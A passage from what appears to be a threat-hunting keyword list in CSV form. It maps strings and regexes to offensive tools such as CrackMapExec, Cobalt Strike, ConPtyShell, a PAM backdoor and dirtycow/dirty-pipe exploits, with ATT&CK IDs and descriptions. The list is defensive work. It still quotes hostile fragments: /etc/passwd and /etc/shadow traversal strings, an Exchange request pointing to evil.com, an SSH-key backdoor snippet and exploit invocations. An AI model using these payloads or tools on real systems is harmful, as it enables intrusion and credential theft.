TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*$KeePassBinaryPath*",".{0,1000}\$KeePassBinaryPath.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*$KeePassUser*",".{0,1000}\$KeePassUser.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*$Keylogger=*",".{0,1000}\$Keylogger\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$LolDriversVulnerable*",".{0,1000}\$LolDriversVulnerable.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*$MimiTickets*",".{0,1000}\$MimiTickets.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$myC2ipAdress*",".{0,1000}\$myC2ipAdress.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*$myVictimIPAdress*",".{0,1000}\$myVictimIPAdress.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*$N0q$x$Hc2$rQW*",".{0,1000}\$N0q\$x\$Hc2\$rQW.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*$newClass[""__CLASS""] = ""PMEClass""*",".{0,1000}\$newClass\[\""__CLASS\""\]\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$parametersConPtyShell*",".{0,1000}\$parametersConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*$SmbLoginSpray=*",".{0,1000}\$SmbLoginSpray\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$ThisIsNotTheStringYouAreLookingFor*",".{0,1000}\$ThisIsNotTheStringYouAreLookingFor.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" 
"*$TotalNbCurrentPwdDiscovered*",".{0,1000}\$TotalNbCurrentPwdDiscovered.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*$tunneler_dir/loclx.log*",".{0,1000}\$tunneler_dir\/loclx\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*$VeaamRegPath*SqlDatabaseName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlDatabaseName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*$VeaamRegPath*SqlInstanceName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlInstanceName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*$VeaamRegPath*SqlServerName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlServerName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*%APPDATA%/Indexing.*",".{0,1000}\%APPDATA\%\/Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*%appdata%\(s)AINT*",".{0,1000}\%appdata\%\\\(s\)AINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*%APPDATA%\Windows:winrm.vbs*",".{0,1000}\%APPDATA\%\\Windows\:winrm\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*%comspec% /k *.bat*",".{0,1000}\%comspec\%\s\/k\s.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 
- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","0","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*%tmp%\void.zip*",".{0,1000}\%tmp\%\\void\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*",".{0,1000}\&\&\scat\s\/etc\/motd.{0,1000}exec\s\-a\s\-\$\(basename\s\$SHELL\)\s\$SHELL.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*(not launching GPOddity SMB 
server)*",".{0,1000}\(not\slaunching\sGPOddity\sSMB\sserver\).{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*(prog=""bpf-keylogger""*",".{0,1000}\(prog\=\""bpf\-keylogger\"".{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*. Nice assembly :D .*",".{0,1000}\.\sNice\sassembly\s\:D\s\..{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*.*autodiscover\.json.*Powershell.*",".{0,1000}\..{0,1000}autodiscover\\\.json\..{0,1000}Powershell\..{0,1000}","offensive_tool_keyword","POC","forged request. exemple: autodiscover/autodiscover.json?@evil.com/&Email=autodiscover/autodiscover.json%3f@evil.com","T1190 - T1140 - T1564 - T1204 - T1505","TA0001 - TA0005","N/A","N/A","Exploitation tools","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*... every office needs a tool like Georg*",".{0,1000}\.\.\.\severy\soffice\sneeds\sa\stool\slike\sGeorg.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*../../../../../../etc/passwd*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*../../../../../../etc/shadow*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/shadow.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*./*octopus.py*",".{0,1000}\.\/.{0,1000}octopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*./agscript *",".{0,1000}\.\/agscript\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./agscript * nemesis-bot *",".{0,1000}\.\/agscript\s.{0,1000}\snemesis\-bot\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*./AutoSUID.sh*",".{0,1000}\.\/AutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - 
TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./awsloot *",".{0,1000}\.\/awsloot\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*./awsloot.py*",".{0,1000}\.\/awsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*./backdoor.sh *",".{0,1000}\.\/backdoor\.sh\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*./Brutesploit*",".{0,1000}\.\/Brutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*./c2lint *",".{0,1000}\.\/c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*./chisel *",".{0,1000}\.\/chisel\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation 
tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./cowpy.sh *",".{0,1000}\.\/cowpy\.sh\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*./cowroot*",".{0,1000}\.\/cowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","29","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" "*./dcow -s*",".{0,1000}\.\/dcow\s\-s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","4","307","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" "*./Dent -*",".{0,1000}\.\/Dent\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*./dirty*",".{0,1000}\.\/dirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","9","817","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" "*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","48","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*./dnscat*",".{0,1000}\.\/dnscat.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*./dome.py*",".{0,1000}\.\/dome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*./donut 
*.exe*",".{0,1000}\.\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*./dynasty.sh*",".{0,1000}\.\/dynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*./evil-proxy*",".{0,1000}\.\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*./Exfil.sh*",".{0,1000}\.\/Exfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*./exploit /etc/passwd 1 *cat 
/etc/passwd*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\s.{0,1000}cat\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","0","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" "*./exploit /etc/passwd 1 ootz:*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\sootz\:.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" "*./fake-sms*",".{0,1000}\.\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" 